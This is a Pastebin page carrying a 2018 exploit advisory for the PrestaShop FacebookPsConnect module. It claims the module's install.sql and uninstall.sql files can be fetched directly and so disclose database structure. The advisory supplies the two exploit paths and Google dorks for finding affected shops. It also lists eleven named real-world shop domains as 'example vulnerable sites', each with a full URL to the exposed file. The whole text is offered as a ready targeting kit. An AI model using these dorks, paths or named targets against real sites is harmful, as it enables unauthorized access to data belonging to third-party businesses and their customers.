API tools faq
paste
KingSkrupellos

PrestaShop FacebookPsConnect 1.6.1.4 Database Disclosure

KingSkrupellos
Dec 23rd, 2018
470
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.79 KB | None | 0 0
raw download clone embed print report
  1. #################################################################################################
  2.  
  3. # Exploit Title : PrestaShop FacebookPsConnect Modules 1.6.1.4 Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 24/12/2018
  6. # Vendor Homepage : prestashop.com ~ businesstech.fr
  7. # Software Download Link : modulebazaar.com/prestashop-facebook-connect.html
  8. + sourceforge.net/projects/prestashopfacebookconnect/
  9. # Software Installation Price : 50$
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Version Information : 1.4.11.0± ~ 1.5.4.0 ~ 1.5.5.0 ~ 1.5.6.1 ~ 1.5.6.2 ~ 1.6.1.4 ~ 1.6.0.9
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/modules/facebookpsconnect/sql/''
  15. intext:''Fièrement réalisé par Mezcalito''
  16. intext:''Copyright 2018 / PrestaShop. Implented by DGWStudios.com & Design by LeoTheme''
  17. intext:''Copyrights 2012 rygeshop.dk Alle rettigheder forbeholdes''
  18. intext:''© 2018 Powered by Billiandi Creations Ltd™''
  19. intext:''© 2013 - Vinta Quatre. Tous droits réservés - Création Yellow Agence Internet''
  20. intext:''© 2013 oscadi.com™''
  21. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  22. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  23.  
  24. #################################################################################################
  25.  
  26. * PrestaShop FacebookPsConnect Modules Install Uninstall Script Database Disclosure
  27.  
  28. #################################################################################################
  29.  
  30. # Exploit :
  31.  
  32. /modules/facebookpsconnect/sql/install.sql
  33.  
  34. /modules/facebookpsconnect/sql/uninstall.sql
  35.  
  36. #################################################################################################
  37.  
  38. # Example Vulnerable Sites =>
  39.  
  40. [+] fcgshop.com/modules/facebookpsconnect/sql/install.sql
  41.  
  42. [+] vinta-quatre.com/modules/facebookpsconnect/sql/install.sql
  43.  
  44. [+] poemana.com/catalogue/modules/facebookpsconnect/sql/install.sql
  45.  
  46. [+] lecoindespetits.com/modules/facebookpsconnect/sql/install.sql
  47.  
  48. [+] dimayori.com.gt/modules/facebookpsconnect/sql/install.sql
  49.  
  50. [+] shakarababe.com/modules/facebookpsconnect/sql/
  51.  
  52. [+] neurodigital.es/store/modules/facebookpsconnect/sql/install.sql
  53.  
  54. [+] rygeshop.dk/modules/facebookpsconnect/sql/install.sql
  55.  
  56. [+] ultimateparisguide.com/registration/modules/facebookpsconnect/sql/install.sql
  57.  
  58. [+] dietanat.com/modules/facebookpsconnect/sql/install.sql
  59.  
  60. [+] margauxlonnberg.com/shop/modules/facebookpsconnect/sql/install.sql
  61.  
  62. #################################################################################################
  63.  
  64. # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team
  65.  
  66. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!